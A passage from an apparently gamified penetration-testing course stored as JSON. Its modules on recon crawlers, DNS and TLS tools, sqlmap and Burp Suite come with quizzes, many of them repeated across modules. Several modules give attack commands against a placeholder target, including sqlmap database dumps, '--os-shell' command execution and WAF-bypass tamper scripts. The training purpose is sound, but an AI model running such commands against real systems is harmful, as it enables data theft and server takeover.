server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-hakrawler","cat":"Reconnaissance","title":"Hakrawler Web Crawling","diff":2,"xp":150,"intro":"Discover URLs and endpoints by crawling websites.","sections":[{"type":"text","content":"Discover URLs and endpoints by crawling websites."},{"type":"code","lang":"bash","content":"echo https://target.com | hakrawler -d 3 -plain\necho https://target.com | hakrawler -js"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Hakrawler discovers...","opts":["Vulnerabilities","URLs, endpoints, and JavaScript files by crawling","Open ports","DNS records"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-gau","cat":"Reconnaissance","title":"GetAllUrls (gau)","diff":2,"xp":150,"intro":"Fetch known URLs from multiple sources.","sections":[{"type":"text","content":"Fetch known URLs from multiple sources."},{"type":"code","lang":"bash","content":"gau target.com | sort -u\ngau target.com | grep -iE '.js$|api|admin|config'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"gau aggregates URLs from...","opts":["Port scanning","Wayback Machine, Common Crawl, and other URL databases","DNS","Active crawling"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-katana","cat":"Reconnaissance","title":"Katana Next-Gen Crawler","diff":2,"xp":150,"intro":"Modern web crawler with headless browser support.","sections":[{"type":"text","content":"Modern web crawler with headless browser support."},{"type":"code","lang":"bash","content":"katana -u https://target.com -d 3 -jc\nkatana -u https://target.com -headless"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Katana's headless mode...","opts":["Is slower","Renders JavaScript to find dynamic endpoints","Uses less memory","Is simpler"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-dnsx","cat":"Reconnaissance","title":"dnsx DNS Toolkit","diff":2,"xp":150,"intro":"Fast DNS querying and validation.","sections":[{"type":"text","content":"Fast DNS querying and validation."},{"type":"code","lang":"bash","content":"cat subs.txt | dnsx -resp -a -cname\ncat subs.txt | dnsx -silent | httpx"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"dnsx validates...","opts":["Vulnerabilities","DNS resolution of discovered subdomains","Exploitation paths","Network topology"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-tlsx","cat":"Reconnaissance","title":"TLS Certificate Analysis","diff":2,"xp":150,"intro":"Extract intelligence from TLS certificates at scale.","sections":[{"type":"text","content":"Extract intelligence from TLS certificates at scale."},{"type":"code","lang":"bash","content":"echo target.com | tlsx -san -cn -org\ncat hosts.txt | tlsx -san -json"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"TLS SAN fields reveal...","opts":["Encryption strength","Additional hostnames on the same certificate","Private keys","User passwords"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-w-sqli-tools","cat":"Web Application","title":"SQLi Tool Comparison","diff":1,"xp":75,"intro":"sqlmap vs manual \u2014 when to use each.","sections":[{"type":"text","content":"sqlmap vs manual \u2014 when to use each."},{"type":"code","lang":"bash","content":"sqlmap -u 'http://target/?id=1' --dump\nsqlmap -u 'http://target/?id=1' --dbs\nsqlmap -u 'http://target/?id=1' --os-shell"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"sqlmap's --os-shell attempts...","opts":["Data dump","OS command execution through the database","Schema extraction","User enumeration"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-sqli-tamper","cat":"Web Application","title":"sqlmap Tamper Scripts","diff":3,"xp":200,"intro":"Bypass WAFs with sqlmap tamper scripts.","sections":[{"type":"text","content":"Bypass WAFs with sqlmap tamper scripts."},{"type":"code","lang":"bash","content":"sqlmap -u 'http://target/?id=1' --tamper=space2comment\nsqlmap -u 'http://target/?id=1' --tamper=between,randomcase\nsqlmap --list-tampers  # show all available"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Tamper scripts modify...","opts":["The target URL","SQL payloads to bypass WAF filters","The database","Network packets"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"g-w-burp-basics","cat":"Web Application","title":"Burp Suite Basics","diff":1,"xp":75,"intro":"Intercept, modify, and replay HTTP requests.","sections":[{"type":"text","content":"Intercept, modify, and replay HTTP requests."},{"type":"code","lang":"bash","content":"# Proxy: intercept browser traffic\n# Repeater: modify and resend requests\n# Intruder: automated parameter fuzzing\n# Scanner: active vulnerability detection"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Burp Repeater is used to...","opts":["Scan automatically","Manually modify and resend specific requests","Brute force","Spider the site"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy 